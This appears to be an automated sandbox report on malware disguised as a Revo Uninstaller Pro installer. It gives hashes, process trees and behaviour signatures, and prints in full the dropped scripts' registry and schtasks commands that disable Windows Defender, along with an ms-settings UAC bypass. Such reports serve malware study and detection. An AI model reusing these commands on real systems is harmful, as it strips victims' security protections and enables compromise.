Analysis
-
max time kernel
143s -
max time network
41s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
11-05-2022 23:08
Static task
static1
Behavioral task
behavioral1
Sample
16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe
Resource
win10v2004-20220414-en
General
-
Target
16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe
-
Size
21.1MB
-
MD5
d8d732922c11a5f9ae7abf4580ce58af
-
SHA1
55f3b06b60c561a928d956bea991a4409eb50d8e
-
SHA256
16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b
-
SHA512
2a58bef05f60c2cfc240be229a3b4abe8a1d01c3fa8361ca9ab9a58c343632efa44eccb8f9bd7657976e3d891bd52ad9f6972bd5e21897f8e153c9b3522d9e0e
Malware Config
Signatures
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Executes dropped EXE 8 IoCs
Processes:
16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmpRevo Uninstaller Pro 4.2.3.exeRevo Uninstaller Pro 4.2.3.tmp7z.exe7z.exe7z.exe7z.exeiMtu_gQB.exepid process 1940 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp 2008 Revo Uninstaller Pro 4.2.3.exe 664 Revo Uninstaller Pro 4.2.3.tmp 1484 7z.exe 1876 7z.exe 1916 7z.exe 1548 7z.exe 1732 iMtu_gQB.exe -
Loads dropped DLL 11 IoCs
Processes:
16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmpRevo Uninstaller Pro 4.2.3.execmd.exe7z.exe7z.exe7z.exe7z.exeiMtu_gQB.exepid process 304 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe 1940 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp 1940 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp 2008 Revo Uninstaller Pro 4.2.3.exe 888 cmd.exe 1484 7z.exe 1876 7z.exe 1916 7z.exe 1548 7z.exe 888 cmd.exe 1732 iMtu_gQB.exe -
Drops file in Program Files directory 2 IoCs
Processes:
16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmpdescription ioc process File opened for modification C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp File created C:\Program Files (x86)\is-BT1IS.tmp 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 972 timeout.exe -
Modifies registry class 7 IoCs
Processes:
reg.exereg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\windows\\SysWow64\\cmd.exe /c REG ADD HKLM\\software\\microsoft\\windows\\currentversion\\policies\\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" reg.exe Key created \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\ms-settings\shell\open\command reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\ms-settings\shell\open\command\DelegateExecute = " " reg.exe Key created \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\ms-settings\shell\open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\ms-settings\shell reg.exe Key created \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\ms-settings\shell\open reg.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmpiMtu_gQB.exepid process 1940 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp 1940 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp 1732 iMtu_gQB.exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
Processes:
7z.exe7z.exe7z.exe7z.exeiMtu_gQB.exedescription pid process Token: SeRestorePrivilege 1484 7z.exe Token: 35 1484 7z.exe Token: SeSecurityPrivilege 1484 7z.exe Token: SeSecurityPrivilege 1484 7z.exe Token: SeRestorePrivilege 1876 7z.exe Token: 35 1876 7z.exe Token: SeSecurityPrivilege 1876 7z.exe Token: SeSecurityPrivilege 1876 7z.exe Token: SeRestorePrivilege 1916 7z.exe Token: 35 1916 7z.exe Token: SeSecurityPrivilege 1916 7z.exe Token: SeSecurityPrivilege 1916 7z.exe Token: SeRestorePrivilege 1548 7z.exe Token: 35 1548 7z.exe Token: SeSecurityPrivilege 1548 7z.exe Token: SeSecurityPrivilege 1548 7z.exe Token: SeDebugPrivilege 1732 iMtu_gQB.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmppid process 1940 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmpRevo Uninstaller Pro 4.2.3.exeWScript.execmd.execmd.exedescription pid process target process PID 304 wrote to memory of 1940 304 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp PID 304 wrote to memory of 1940 304 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp PID 304 wrote to memory of 1940 304 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp PID 304 wrote to memory of 1940 304 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp PID 304 wrote to memory of 1940 304 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp PID 304 wrote to memory of 1940 304 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp PID 304 wrote to memory of 1940 304 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp PID 1940 wrote to memory of 2008 1940 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp Revo Uninstaller Pro 4.2.3.exe PID 1940 wrote to memory of 2008 1940 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp Revo Uninstaller Pro 4.2.3.exe PID 1940 wrote to memory of 2008 1940 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp Revo Uninstaller Pro 4.2.3.exe PID 1940 wrote to memory of 2008 1940 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp Revo Uninstaller Pro 4.2.3.exe PID 1940 wrote to memory of 2008 1940 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp Revo Uninstaller Pro 4.2.3.exe PID 1940 wrote to memory of 2008 1940 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp Revo Uninstaller Pro 4.2.3.exe PID 1940 wrote to memory of 2008 1940 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp Revo Uninstaller Pro 4.2.3.exe PID 2008 wrote to memory of 664 2008 Revo Uninstaller Pro 4.2.3.exe Revo Uninstaller Pro 4.2.3.tmp PID 2008 wrote to memory of 664 2008 Revo Uninstaller Pro 4.2.3.exe Revo Uninstaller Pro 4.2.3.tmp PID 2008 wrote to memory of 664 2008 Revo Uninstaller Pro 4.2.3.exe Revo Uninstaller Pro 4.2.3.tmp PID 2008 wrote to memory of 664 2008 Revo Uninstaller Pro 4.2.3.exe Revo Uninstaller Pro 4.2.3.tmp PID 2008 wrote to memory of 664 2008 Revo Uninstaller Pro 4.2.3.exe Revo Uninstaller Pro 4.2.3.tmp PID 2008 wrote to memory of 664 2008 Revo Uninstaller Pro 4.2.3.exe Revo Uninstaller Pro 4.2.3.tmp PID 2008 wrote to memory of 664 2008 Revo Uninstaller Pro 4.2.3.exe Revo Uninstaller Pro 4.2.3.tmp PID 1940 wrote to memory of 1608 1940 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp WScript.exe PID 1940 wrote to memory of 1608 1940 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp WScript.exe PID 1940 wrote to memory of 1608 1940 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp WScript.exe PID 1940 wrote to memory of 1608 1940 16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp WScript.exe PID 1608 wrote to memory of 1276 1608 WScript.exe cmd.exe PID 1608 wrote to memory of 1276 1608 WScript.exe cmd.exe PID 1608 wrote to memory of 1276 1608 WScript.exe cmd.exe PID 1608 wrote to memory of 1276 1608 WScript.exe cmd.exe PID 1608 wrote to memory of 1004 1608 WScript.exe cmd.exe PID 1608 wrote to memory of 1004 1608 WScript.exe cmd.exe PID 1608 wrote to memory of 1004 1608 WScript.exe cmd.exe PID 1608 wrote to memory of 1004 1608 WScript.exe cmd.exe PID 1004 wrote to memory of 760 1004 cmd.exe reg.exe PID 1004 wrote to memory of 760 1004 cmd.exe reg.exe PID 1004 wrote to memory of 760 1004 cmd.exe reg.exe PID 1004 wrote to memory of 760 1004 cmd.exe reg.exe PID 1276 wrote to memory of 1880 1276 cmd.exe reg.exe PID 1276 wrote to memory of 1880 1276 cmd.exe reg.exe PID 1276 wrote to memory of 1880 1276 cmd.exe reg.exe PID 1276 wrote to memory of 1880 1276 cmd.exe reg.exe PID 1004 wrote to memory of 1416 1004 cmd.exe reg.exe PID 1004 wrote to memory of 1416 1004 cmd.exe reg.exe PID 1004 wrote to memory of 1416 1004 cmd.exe reg.exe PID 1004 wrote to memory of 1416 1004 cmd.exe reg.exe PID 1276 wrote to memory of 1864 1276 cmd.exe reg.exe PID 1276 wrote to memory of 1864 1276 cmd.exe reg.exe PID 1276 wrote to memory of 1864 1276 cmd.exe reg.exe PID 1276 wrote to memory of 1864 1276 cmd.exe reg.exe PID 1276 wrote to memory of 1916 1276 cmd.exe reg.exe PID 1276 wrote to memory of 1916 1276 cmd.exe reg.exe PID 1276 wrote to memory of 1916 1276 cmd.exe reg.exe PID 1276 wrote to memory of 1916 1276 cmd.exe reg.exe PID 1276 wrote to memory of 520 1276 cmd.exe reg.exe PID 1276 wrote to memory of 520 1276 cmd.exe reg.exe PID 1276 wrote to memory of 520 1276 cmd.exe reg.exe PID 1276 wrote to memory of 520 1276 cmd.exe reg.exe PID 1276 wrote to memory of 1112 1276 cmd.exe reg.exe PID 1276 wrote to memory of 1112 1276 cmd.exe reg.exe PID 1276 wrote to memory of 1112 1276 cmd.exe reg.exe PID 1276 wrote to memory of 1112 1276 cmd.exe reg.exe PID 1276 wrote to memory of 1668 1276 cmd.exe reg.exe PID 1276 wrote to memory of 1668 1276 cmd.exe reg.exe PID 1276 wrote to memory of 1668 1276 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe"C:\Users\Admin\AppData\Local\Temp\16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-IBDN6.tmp\16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp"C:\Users\Admin\AppData\Local\Temp\is-IBDN6.tmp\16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.tmp" /SL5="$60122,21430934,788992,C:\Users\Admin\AppData\Local\Temp\16add217626ff23aed9e35d98358a3b67485f3ea1fef7b895c9c86dfe394127b.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-DUIEU.tmp\Revo Uninstaller Pro 4.2.3.tmp"C:\Users\Admin\AppData\Local\Temp\is-DUIEU.tmp\Revo Uninstaller Pro 4.2.3.tmp" /SL5="$101B0,16350626,188928,C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\WsrD\MMF.vbs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ProgramData\WsrD\DisableOAVProtection.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable5⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f5⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f5⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f5⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f5⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f5⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies security service
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f5⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ProgramData\WsrD\DisableUserAccountControl.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f5⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f5⤵
- Modifies registry class
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ProgramData\WsrD\main.bat" "4⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\mode.commode 65,105⤵
-
C:\ProgramData\WsrD\7z.exe7z.exe e file.zip -p___________26672pwd30077pwd1546___________ -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\WsrD\7z.exe7z.exe e extracted/file_3.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\WsrD\7z.exe7z.exe e extracted/file_2.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\WsrD\7z.exe7z.exe e extracted/file_1.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\WsrD\iMtu_gQB.exe"iMtu_gQB.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ProgramData\WsrD\DiskRemoval.bat" "4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 60 /NOBREAK5⤵
- Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exeFilesize
16.1MB
MD51540ebe79933021c71b37d11ca590c6e
SHA15c3f54e29894d5d973e5a06d9b9cf53f723bcacf
SHA2564c4258c10a1e7a0e7ab5529e68467cf23f5835621cff6dae204da456858d622a
SHA51243ffc343ac95b52d62f2e918e8c5d7a65fd59a5f165643dbfadc4610b50d1460bdf561ab6ac0c02aa587abc0992acbaa2af6ef73f1b2ac75371d6d30292bb2d5
-
C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exeFilesize
16.1MB
MD51540ebe79933021c71b37d11ca590c6e
SHA15c3f54e29894d5d973e5a06d9b9cf53f723bcacf
SHA2564c4258c10a1e7a0e7ab5529e68467cf23f5835621cff6dae204da456858d622a
SHA51243ffc343ac95b52d62f2e918e8c5d7a65fd59a5f165643dbfadc4610b50d1460bdf561ab6ac0c02aa587abc0992acbaa2af6ef73f1b2ac75371d6d30292bb2d5
-
C:\ProgramData\WsrD\7z.dllFilesize
1.6MB
MD572491c7b87a7c2dd350b727444f13bb4
SHA11e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA25634ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511
-
C:\ProgramData\WsrD\7z.exeFilesize
458KB
MD5619f7135621b50fd1900ff24aade1524
SHA16c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA5122c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
-
C:\ProgramData\WsrD\7z.exeFilesize
458KB
MD5619f7135621b50fd1900ff24aade1524
SHA16c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA5122c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
-
C:\ProgramData\WsrD\7z.exeFilesize
458KB
MD5619f7135621b50fd1900ff24aade1524
SHA16c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA5122c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
-
C:\ProgramData\WsrD\7z.exeFilesize
458KB
MD5619f7135621b50fd1900ff24aade1524
SHA16c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA5122c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
-
C:\ProgramData\WsrD\7z.exeFilesize
458KB
MD5619f7135621b50fd1900ff24aade1524
SHA16c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA5122c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
-
C:\ProgramData\WsrD\DisableOAVProtection.batFilesize
105KB
MD5687cc2fd21ae18a05a907e3f0b27411b
SHA17a5129c77d6721ea8c3aceab90c1b5576638d14b
SHA2566d09ddc3211e2840fcbcb463a22daf52664ef5d0f7234bb39ebeaaf5a0b8e632
SHA512a69138598acb78954b99f986afa08d69ebd607a79d2733cfb904473651b34ff10aa6a6a08704f0d0bafafd962af7093b510addf3d1909523a8e8884c505e3b59
-
C:\ProgramData\WsrD\DisableUserAccountControl.batFilesize
17KB
MD5e02bb39aab8a10eba07f113d7a548f9c
SHA12dcd92059dea564ef18b7bdbc931623a566628da
SHA25696deb3e68b5bc4bd430624fd5d79113d0fb018b0afc401380b4662b4f0d9c617
SHA5124b908a5b1eef6c799c057299d3b6c70aa567962edf42f390d330a5c6c0c2fd00872708f7f3d56d4323f7773ad1c15e663798e08f7c309c219555ee656de49223
-
C:\ProgramData\WsrD\DiskRemoval.batFilesize
254B
MD58c3372370db3c9dc3198135ad3162d20
SHA1a30bf13314631716719094e52fd6e132f442fdbf
SHA25663c360cd9f78fc0753a498f45b86c377416881e5560ea3de7908051c93bc0931
SHA5126740d093a86c1f5121ee3c6db351152b9f97b06b0bad2a18545964d2e9e2d557cff07e6461e0772c0caa46ee265f82bf85ea78c512a98d377e0b8b261e7cd347
-
C:\ProgramData\WsrD\MMF.vbsFilesize
30KB
MD5bd64d967bf72703baaf72bfb5b353b4b
SHA1ce34e28d066cd9b18d7fd7877c61481dfb6767cb
SHA256c79920873a439db91c50ec806da982920d8b3d06f9fdfda0b457acaa6220606a
SHA512ef79c00a3d4c7a66872cc55400f4db14f106f5a5852798fc98df298f801cddc744d20648dfeea2bfee229496cf6cefbe2b92925b82e579c4f6fa26e4c507de43
-
C:\ProgramData\WsrD\extracted\ANTIAV~1.DATFilesize
2.0MB
MD58ceec208145b1d1f26fc47503edb0a80
SHA129933f0907627f967044df7e297c3b806f4ca39d
SHA256ae3a9d6b2f49629750beedd4f0708b899b6b79b27cf904521e89e017794534eb
SHA51226b2eed60d4217b8cb95a6e6674b6feaba16b5660e6420f78f2467e1e20c51637b29a8c79e44526a43cccea5827d120d5804957e4dcc429c4bbfcf14aae72b9b
-
C:\ProgramData\WsrD\extracted\file_1.zipFilesize
1.2MB
MD5506fce55cfc87027055296a6a2863826
SHA143752a732db857183b87d552377b00515427db39
SHA256610c870b3bdb17010f9d866b705e999b49c477e6ed3727774b4b5f311da2cf8a
SHA512bc459438522960a94fefc6aa838631275b24518a800255716811e3c6cd924cbe431ccc88d974f269058655de674d43e977e83361a3821bfe0328ef64b87ff785
-
C:\ProgramData\WsrD\extracted\file_2.zipFilesize
1.2MB
MD50a1fb9ad84cf9697f6092ffa9f43a2b4
SHA17a8a747117b8722a53ce7564dda55872554cb004
SHA25680e16abd7da579d0f29eacabd1a1898a887a95fd9e7d3360c96d6a9ff8f95710
SHA5125521e83d8b38ffa7bb67d19b07802c2606852c4fe59d9bfc8106e1cee1f091d42d262174f49e0d91c0b404162a24516143a1dd4d2349320344186da9b416a8e0
-
C:\ProgramData\WsrD\extracted\file_3.zipFilesize
2.7MB
MD50cbfe9677da8a8edb981106803628708
SHA12d9b5b2db605b452c7ad3c14ac55bffe97f84b52
SHA256df6102a874cb0b19e8ab9ecef406bc6965d7c9b3bbf394eadd07aad33263e0df
SHA5121a3a45179d4a3af16231dea3394d73aa1322f39a01218ec912bc94cf435f5988560c2573fc03b09f82634704cd38f1d790b8469889d402de233a52c22111d6b5
-
C:\ProgramData\WsrD\extracted\iMtu_gQB.exeFilesize
1.9MB
MD5dd0146c74694b0d0a32bab320a8a9ee5
SHA1e706f8d4f153b5c60e502f947bded7950f19a901
SHA256429955ad9594118c2d2120d9ed0a0c2d68ed0b605dd948cc8f29055f45ca4035
SHA51272bb8daa6eec9edb871dc515049e82851aec29e8d0828093a214a893e210342d5b66b5bed2ee9c27b5463ad5b29df2639078f42a44357ffd5c62cc10b951b1b1
-
C:\ProgramData\WsrD\file.binFilesize
2.7MB
MD5b3d91bf02bb2ed70c3d8f8e0ab7488a1
SHA1d4eeede743d167d40975d0cc2387a36b80365c31
SHA256f6f91250f54fb99b54acd1c421589edb1a2224cf6818d7b0dd3890971a1c1787
